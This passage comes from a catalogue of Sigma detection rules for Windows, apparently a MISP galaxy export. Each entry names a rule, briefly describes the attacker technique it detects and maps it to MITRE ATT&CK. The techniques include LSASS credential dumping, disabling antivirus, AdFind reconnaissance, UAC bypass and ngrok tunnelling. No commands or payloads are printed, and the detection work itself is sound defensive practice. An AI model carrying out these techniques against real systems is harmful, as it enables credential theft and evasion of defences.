Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses

The tag is: misp-galaxy:sigma-rules="Sysinternals PsSuspend Suspicious Execution"

Sysinternals PsSuspend Suspicious Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10070. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/pssuspend

https://twitter.com/0gtweet/status/1638069413717975046

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml

Potential Obfuscated Ordinal Call Via Rundll32

Detects execution of "rundll32" with potential obfuscated ordinal calls

The tag is: misp-galaxy:sigma-rules="Potential Obfuscated Ordinal Call Via Rundll32"

Table 10072. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml

Renamed AdFind Execution

Detects the use of a renamed Adfind.exe. AdFind continues to be seen across the majority of breaches. It is used for domain trust discovery to plan out subsequent steps in the attack chain.

The tag is: misp-galaxy:sigma-rules="Renamed AdFind Execution"

Renamed AdFind Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

Table 10073. Table References

Links

https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx

https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/

https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md

https://thedfirreport.com/2020/05/08/adfind-recon/

https://www.joeware.net/freetools/tools/adfind/

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml

WhoAmI as Parameter

Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)

The tag is: misp-galaxy:sigma-rules="WhoAmI as Parameter"

WhoAmI as Parameter has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10074. Table References

Links

https://twitter.com/blackarrowsec/status/1463805700602224645?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml

Unusual Parent Process For Cmd.EXE

Detects suspicious parent process for cmd.exe

The tag is: misp-galaxy:sigma-rules="Unusual Parent Process For Cmd.EXE"

Unusual Parent Process For Cmd.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10075. Table References

Links

https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_unusual_parent.yml

Potential Meterpreter/CobaltStrike Activity

Detects the use of the getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting

The tag is: misp-galaxy:sigma-rules="Potential Meterpreter/CobaltStrike Activity"

Potential Meterpreter/CobaltStrike Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

Table 10076. Table References

Links

https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml

Remote Access Tool - Anydesk Execution From Suspicious Folder

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and TeamViewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - Anydesk Execution From Suspicious Folder"

Remote Access Tool - Anydesk Execution From Suspicious Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10077. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml

Disabled Volume Snapshots

Detects commands that temporarily turn off Volume Snapshots

The tag is: misp-galaxy:sigma-rules="Disabled Volume Snapshots"

Disabled Volume Snapshots has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10078. Table References

Links

https://twitter.com/0gtweet/status/1354766164166115331

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_volsnap_disable.yml

Microsoft IIS Connection Strings Decryption

Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or similar can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password, using the aspnet_regiis command.

The tag is: misp-galaxy:sigma-rules="Microsoft IIS Connection Strings Decryption"

Microsoft IIS Connection Strings Decryption has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10079. Table References

Links

https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml

Dumping Process via Sqldumper.exe

Detects process dumping via the legitimate sqldumper.exe binary

The tag is: misp-galaxy:sigma-rules="Dumping Process via Sqldumper.exe"

Dumping Process via Sqldumper.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10080. Table References

Links

https://twitter.com/countuponsec/status/910969424215232518

https://twitter.com/countuponsec/status/910977826853068800

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml

Use Icacls to Hide File to Everyone

Detects use of icacls to deny access to everyone on files in the Users folder, a technique sometimes used to hide malicious files

The tag is: misp-galaxy:sigma-rules="Use Icacls to Hide File to Everyone"

Use Icacls to Hide File to Everyone has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 10081. Table References

Links

https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_icacls_deny.yml

Obfuscated IP Via CLI

Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line

The tag is: misp-galaxy:sigma-rules="Obfuscated IP Via CLI"

Table 10082. Table References

Links

https://twitter.com/Yasser_Elsnbary/status/1553804135354564608

https://h.43z.one/ipconverter/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml

Query Usage To Exfil Data

Detects usage of "query.exe", a system binary, to exfiltrate information such as "sessions" and "processes" for later use

The tag is: misp-galaxy:sigma-rules="Query Usage To Exfil Data"

Table 10083. Table References

Links

https://twitter.com/MichalKoczwara/status/1553634816016498688

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml

Wusa.EXE Extracting Cab Files From Suspicious Paths

Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab files using the "/extract" argument from suspicious paths

The tag is: misp-galaxy:sigma-rules="Wusa.EXE Extracting Cab Files From Suspicious Paths"

Table 10084. Table References

Links

https://www.echotrail.io/insights/search/wusa.exe/

https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml

SyncAppvPublishingServer Execute Arbitrary PowerShell Code

Detects execution of arbitrary PowerShell code using SyncAppvPublishingServer.exe.

The tag is: misp-galaxy:sigma-rules="SyncAppvPublishingServer Execute Arbitrary PowerShell Code"

SyncAppvPublishingServer Execute Arbitrary PowerShell Code has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10085. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml

Stop Windows Service Via Sc.EXE

Detects the stopping of a Windows service via the "sc.exe" utility

The tag is: misp-galaxy:sigma-rules="Stop Windows Service Via Sc.EXE"

Stop Windows Service Via Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 10086. Table References

Links

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742107(v=ws.11)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_stop_service.yml

Use of Wfc.exe

The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft’s recommended block rules.

The tag is: misp-galaxy:sigma-rules="Use of Wfc.exe"

Use of Wfc.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10087. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml

Suspicious SysAidServer Child

Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)

The tag is: misp-galaxy:sigma-rules="Suspicious SysAidServer Child"

Suspicious SysAidServer Child has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 10088. Table References

Links

https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml

Whoami.EXE Execution Anomaly

Detects the execution of whoami.exe with suspicious parent processes.

The tag is: misp-galaxy:sigma-rules="Whoami.EXE Execution Anomaly"

Whoami.EXE Execution Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10089. Table References

Links

https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/

https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/

https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_parent_anomaly.yml

HackTool - SharpChisel Execution

Detects usage of SharpChisel via its command-line arguments

The tag is: misp-galaxy:sigma-rules="HackTool - SharpChisel Execution"

HackTool - SharpChisel Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

Table 10090. Table References

Links

https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/

https://github.com/shantanu561993/SharpChisel

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_chisel.yml

Suspicious GUP Usage

Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks

The tag is: misp-galaxy:sigma-rules="Suspicious GUP Usage"

Suspicious GUP Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 10091. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gup_suspicious_execution.yml

PUA - Ngrok Execution

Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for download and *.ngrok.io for connections.

The tag is: misp-galaxy:sigma-rules="PUA - Ngrok Execution"

PUA - Ngrok Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 10093. Table References

Links

https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/

https://ngrok.com/docs

https://twitter.com/xorJosh/status/1598646907802451969

https://www.softwaretestinghelp.com/how-to-use-ngrok/

https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp

https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection

https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ngrok.yml

Gpscript Execution

Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy

The tag is: misp-galaxy:sigma-rules="Gpscript Execution"

Gpscript Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10094. Table References

Links

https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/

https://lolbas-project.github.io/lolbas/Binaries/Gpscript/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml

Phishing Pattern ISO in Archive

Detects cases in which an ISO file is opened within an archiver like 7Zip or WinRAR, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (Mark-of-the-Web)

The tag is: misp-galaxy:sigma-rules="Phishing Pattern ISO in Archive"

Phishing Pattern ISO in Archive has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

Table 10095. Table References

Links

https://twitter.com/1ZRR4H/status/1534259727059787783

https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml

CMSTP UAC Bypass via COM Object Access

Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)

The tag is: misp-galaxy:sigma-rules="CMSTP UAC Bypass via COM Object Access"

CMSTP UAC Bypass via COM Object Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

Table 10097. Table References

Links

https://github.com/hfiref0x/UACME

https://twitter.com/hFireF0X/status/897640081053364225

https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml

CMSTP Execution Process Creation

Detects various indicators of Microsoft Connection Manager Profile Installer execution

The tag is: misp-galaxy:sigma-rules="CMSTP Execution Process Creation"

CMSTP Execution Process Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

Table 10098. Table References

Links

https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml

Arbitrary Command Execution Using WSL

Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary Linux or Windows commands

The tag is: misp-galaxy:sigma-rules="Arbitrary Command Execution Using WSL"

Arbitrary Command Execution Using WSL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10099. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/

https://twitter.com/nas_bench/status/1535431474429808642

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml

Malicious Base64 Encoded PowerShell Keywords in Command Lines

Detects base64 encoded strings used in hidden malicious PowerShell command lines

The tag is: misp-galaxy:sigma-rules="Malicious Base64 Encoded PowerShell Keywords in Command Lines"

Malicious Base64 Encoded PowerShell Keywords in Command Lines has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10100. Table References

Links

http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_hidden_flag.yml

Potential Product Reconnaissance Via Wmic.EXE

Detects the execution of WMIC in order to get a list of firewall and antivirus products

The tag is: misp-galaxy:sigma-rules="Potential Product Reconnaissance Via Wmic.EXE"

Potential Product Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10101. Table References

Links

https://thedfirreport.com/2023/03/06/2022-year-in-review/

https://www.yeahhub.com/list-installed-programs-version-path-windows/

https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product.yml

Suspicious XOR Encoded PowerShell Command

Detects the presence of a potentially XOR-encoded PowerShell command

The tag is: misp-galaxy:sigma-rules="Suspicious XOR Encoded PowerShell Command"

Suspicious XOR Encoded PowerShell Command has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10102. Table References

Links

https://redcanary.com/blog/yellow-cockatoo/

https://mez0.cc/posts/cobaltstrike-powershell-exec/

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65

https://zero2auto.com/2020/05/19/netwalker-re/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml

Remote PowerShell Session Host Process (WinRM)

Detects remote PowerShell sessions by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).

The tag is: misp-galaxy:sigma-rules="Remote PowerShell Session Host Process (WinRM)"

Remote PowerShell Session Host Process (WinRM) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 10104. Table References

Links

https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml

HackTool - XORDump Execution

Detects suspicious use of XORDump process memory dumping utility

The tag is: misp-galaxy:sigma-rules="HackTool - XORDump Execution"

HackTool - XORDump Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10105. Table References

Links

https://github.com/audibleblink/xordump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_xordump.yml

PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE

Detects active directory enumeration activity using known AdFind CLI flags

The tag is: misp-galaxy:sigma-rules="PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE"

PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

Table 10106. Table References

Links

https://www.joeware.net/freetools/tools/adfind/

https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml

PDQ Deploy Remote Adminstartion Tool Execution

Detect use of PDQ Deploy remote admin tool

The tag is: misp-galaxy:sigma-rules="PDQ Deploy Remote Adminstartion Tool Execution"

PDQ Deploy Remote Adminstartion Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 10107. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md

https://www.pdq.com/pdq-deploy/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_execution.yml

Proxy Execution Via Wuauclt.EXE

Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.

The tag is: misp-galaxy:sigma-rules="Proxy Execution Via Wuauclt.EXE"

Proxy Execution Via Wuauclt.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10108. Table References

Links

https://dtm.uk/wuauclt/

https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wuauclt_dll_loading.yml

WMI Persistence - Script Event Consumer

Detects WMI script event consumers

The tag is: misp-galaxy:sigma-rules="WMI Persistence - Script Event Consumer"

WMI Persistence - Script Event Consumer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 10109. Table References

Links

https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml

Execute Code with Pester.bat

Detects code execution via Pester.bat (Pester - PowerShell module for testing)

The tag is: misp-galaxy:sigma-rules="Execute Code with Pester.bat"

Execute Code with Pester.bat has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10110. Table References

Links

https://twitter.com/Oddvarmoe/status/993383596244258816

https://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml

Potential Mftrace.EXE Abuse

Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe), which can be abused to execute arbitrary binaries.

The tag is: misp-galaxy:sigma-rules="Potential Mftrace.EXE Abuse"

Potential Mftrace.EXE Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10111. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mftrace_child_process.yml

Potential Command Line Path Traversal Evasion Attempt

Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline

The tag is: misp-galaxy:sigma-rules="Potential Command Line Path Traversal Evasion Attempt"

Potential Command Line Path Traversal Evasion Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10112. Table References

Links

https://twitter.com/Gal_B1t/status/1062971006078345217

https://twitter.com/hexacorn/status/1448037865435320323

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml

Regsvr32 Execution From Highly Suspicious Location

Detects execution of regsvr32 where the DLL is located in a highly suspicious location

The tag is: misp-galaxy:sigma-rules="Regsvr32 Execution From Highly Suspicious Location"

Regsvr32 Execution From Highly Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10113. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml

Chromium Browser Instance Executed With Custom Extension

Detects a Chromium based browser process started with the 'load-extension' flag, which launches an instance with a custom extension

The tag is: misp-galaxy:sigma-rules="Chromium Browser Instance Executed With Custom Extension"

Chromium Browser Instance Executed With Custom Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"

Table 10114. Table References

Links

https://emkc.org/s/RJjuLa

https://redcanary.com/blog/chromeloader/

https://www.mandiant.com/resources/blog/lnk-between-browsers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml

Browser Execution In Headless Mode

Detects execution of Chromium based browser in headless mode

The tag is: misp-galaxy:sigma-rules="Browser Execution In Headless Mode"

Browser Execution In Headless Mode has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10115. Table References

Links

https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html

https://twitter.com/mrd0x/status/1478234484881436672?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml

Potentially Suspicious Child Process Of WinRAR.EXE

Detects potentially suspicious child processes of WinRAR.exe.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Child Process Of WinRAR.EXE"

Potentially Suspicious Child Process Of WinRAR.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 10116. Table References

Links

https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md

https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_susp_child_process.yml

Taskmgr as LOCAL_SYSTEM

Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM

The tag is: misp-galaxy:sigma-rules="Taskmgr as LOCAL_SYSTEM"

Taskmgr as LOCAL_SYSTEM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10117. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskmgr_localsystem.yml

Suspicious Execution Of PDQDeployRunner

Detects suspicious execution of "PDQDeployRunner", which is part of the PDQDeploy service stack that is responsible for executing commands and packages on remote machines

The tag is: misp-galaxy:sigma-rules="Suspicious Execution Of PDQDeployRunner"

Table 10118. Table References

Links

